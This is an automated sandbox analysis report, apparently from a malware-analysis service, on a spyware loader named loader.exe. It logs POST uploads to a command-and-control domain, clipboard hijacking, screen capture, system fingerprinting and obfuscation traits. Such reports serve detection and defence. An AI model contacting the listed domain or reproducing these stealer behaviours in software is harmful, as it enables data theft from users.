Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y91F1EBD6DJ6IK0NSVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570417Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: undesirabkel.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: undesirabkel.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click

Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: loader.exe, 00000002.00000002.2934789350.0000000003C7F000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000002.00000002.2934517276.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/
Source: loader.exe, 00000002.00000002.2934759254.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/ab
Source: loader.exe, 00000002.00000002.2934517276.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000002.00000002.2934846468.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/api
Source: loader.exe, 00000002.00000002.2934517276.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apiU
Source: loader.exe, 00000002.00000002.2934454000.00000000016BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apil
Source: loader.exe, 00000002.00000002.2934846468.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apilet
Source: loader.exe, 00000002.00000002.2934846468.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apiunch_countnt5

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2

Source: C:\Users\user\Desktop\loader.exe

Code function: 2_2_00436B80 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00436B80

Source: C:\Users\user\Desktop\loader.exe

Code function: 2_2_03AA1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

2_2_03AA1000

Source: C:\Users\user\Desktop\loader.exe

Code function: 2_2_00436B80 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00436B80

Source: C:\Users\user\Desktop\loader.exe

Code function: 2_2_0043759A GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_0043759A

Source: C:\Users\user\Desktop\loader.exe	Code function: 0_2_00BE0870	0_2_00BE0870
Source: C:\Users\user\Desktop\loader.exe	Code function: 0_2_00BE0861	0_2_00BE0861
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0040A01E	2_2_0040A01E
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00428960	2_2_00428960
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0040D973	2_2_0040D973
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0043C900	2_2_0043C900
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004089B0	2_2_004089B0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00439A02	2_2_00439A02
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00425A91	2_2_00425A91
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0043CB40	2_2_0043CB40
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00443B40	2_2_00443B40
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00419B52	2_2_00419B52
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004223B0	2_2_004223B0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00444410	2_2_00444410
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0042FCB0	2_2_0042FCB0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004126F0	2_2_004126F0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0040AFA0	2_2_0040AFA0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0043C050	2_2_0043C050
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0042F85B	2_2_0042F85B
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0042A860	2_2_0042A860
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00406830	2_2_00406830
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00429838	2_2_00429838
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004260D0	2_2_004260D0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004280D0	2_2_004280D0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004430D0	2_2_004430D0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004038E0	2_2_004038E0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0042B8E0	2_2_0042B8E0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004368E0	2_2_004368E0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00444140	2_2_00444140
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0043B15C	2_2_0043B15C
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0043E101	2_2_0043E101
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0043D900	2_2_0043D900
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0040C1CF	2_2_0040C1CF
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004431E0	2_2_004431E0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0041A190	2_2_0041A190
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004231A0	2_2_004231A0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00420260	2_2_00420260
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0041BA1B	2_2_0041BA1B
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00409AD0	2_2_00409AD0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00402AE0	2_2_00402AE0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004432E0	2_2_004432E0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004162E6	2_2_004162E6
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0041728C	2_2_0041728C
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00404290	2_2_00404290
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00405AB0	2_2_00405AB0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0043C2B0	2_2_0043C2B0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00426350	2_2_00426350
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00411B5A	2_2_00411B5A
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00443370	2_2_00443370
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00442B00	2_2_00442B00
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0042B310	2_2_0042B310
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00431B23	2_2_00431B23
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0041CB22	2_2_0041CB22
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0042B8E0	2_2_0042B8E0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004063A0	2_2_004063A0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0042A3A9	2_2_0042A3A9
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0040B460	2_2_0040B460
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0043546D	2_2_0043546D
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00443400	2_2_00443400
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00415C18	2_2_00415C18
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0042FC19	2_2_0042FC19
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00414C30	2_2_00414C30
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0042E4C0	2_2_0042E4C0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00428CC0	2_2_00428CC0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00440CD0	2_2_00440CD0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00428CE0	2_2_00428CE0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004274F0	2_2_004274F0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0041DC80	2_2_0041DC80
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00417485	2_2_00417485
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004084B0	2_2_004084B0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00429D4A	2_2_00429D4A
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00427D60	2_2_00427D60
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00440500	2_2_00440500
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00416517	2_2_00416517
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00426531	2_2_00426531
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004345C0	2_2_004345C0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004095F0	2_2_004095F0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00430D90	2_2_00430D90
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00404DB0	2_2_00404DB0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004325B5	2_2_004325B5
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0041CB22	2_2_0041CB22
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00407610	2_2_00407610
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00408E10	2_2_00408E10
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00417E35	2_2_00417E35
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_004366C0	2_2_004366C0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0041C6D0	2_2_0041C6D0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00402EE0	2_2_00402EE0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00435EF3	2_2_00435EF3
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00443E80	2_2_00443E80
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0040A68C	2_2_0040A68C
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0040DE8E	2_2_0040DE8E
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0043069B	2_2_0043069B
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0043DEA0	2_2_0043DEA0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00432EA5	2_2_00432EA5
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00439EBB	2_2_00439EBB
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0042AF62	2_2_0042AF62
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0041DFE0	2_2_0041DFE0

Source: C:\Users\user\Desktop\loader.exe	Code function: String function: 004081A0 appears 48 times
Source: C:\Users\user\Desktop\loader.exe	Code function: String function: 00414C20 appears 110 times

Source: C:\Users\user\Desktop\loader.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 940

Source: loader.exe, 00000000.00000002.1817641325.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs loader.exe

Source: loader.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: loader.exe

Static PE information: Section: .bss ZLIB complexity 1.0003265477129337

Source: loader.exe, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
Source: loader.exe, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.loader.exe.3a19550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.loader.exe.3a19550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/5@1/1

Source: C:\Users\user\Desktop\loader.exe

Code function: 2_2_0043CB40 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_0043CB40

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Users\user\Desktop\loader.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7320

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\b3317a46-e62f-452a-81b0-84880bbb89bc

Jump to behavior

Source: loader.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: loader.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\loader.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: loader.exe

ReversingLabs: Detection: 31%

Source: loader.exe

String found in binary or memory: file:///C:/Users/user/Desktop/loader.exe

Source: C:\Users\user\Desktop\loader.exe

File read: C:\Users\user\Desktop\loader.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
Source: C:\Users\user\Desktop\loader.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\loader.exe	Process created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
Source: C:\Users\user\Desktop\loader.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 940
Source: C:\Users\user\Desktop\loader.exe	Process created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"	Jump to behavior

Source: C:\Users\user\Desktop\loader.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: loader.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: loader.exe

Static file information: File size 8750080 > 1048576

Source: loader.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: loader.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: System.pdb) source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: Handler.pdb source: loader.exe, WERD5B9.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WERD5B9.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERD5B9.tmp.dmp.5.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: loader.exe, OqnvDGyNnPPvG6T46X.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.loader.exe.3a19550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: loader.exe

Static PE information: 0xB22C430A [Sun Sep 21 17:53:14 2064 UTC]

Source: loader.exe

Static PE information: real checksum: 0x5c88f should be: 0x8608cf

Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0044C2E5 push 00E26845h; iretd	2_2_0044C2EC
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0044BAAF push ds; iretd	2_2_0044BAB0
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_00446BFC push esp; retf	2_2_00446BFF
Source: C:\Users\user\Desktop\loader.exe	Code function: 2_2_0044B705 push ebp; ret	2_2_0044B766

Source: loader.exe, OqnvDGyNnPPvG6T46X.cs	High entropy of concatenated method names: 'Qerauq6FF2', 'nW4lBacjpc', 'NBbmObeVEM', 'bqpm7jSIZK', 'sREmHxnXei', 'uu3mAcrNh4', 'n0OmcKY1xJ', 'A1VRDsBnZ', 'oqBlqdN3O', 'pRhoMmNSX'
Source: 0.2.loader.exe.3a19550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	High entropy of concatenated method names: 'Qerauq6FF2', 'nW4lBacjpc', 'NBbmObeVEM', 'bqpm7jSIZK', 'sREmHxnXei', 'uu3mAcrNh4', 'n0OmcKY1xJ', 'A1VRDsBnZ', 'oqBlqdN3O', 'pRhoMmNSX'

Source: C:\Users\user\Desktop\loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
